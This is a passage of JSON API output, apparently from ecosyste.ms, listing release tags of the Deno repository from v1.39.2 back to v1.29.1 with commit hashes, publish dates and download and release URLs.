e.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/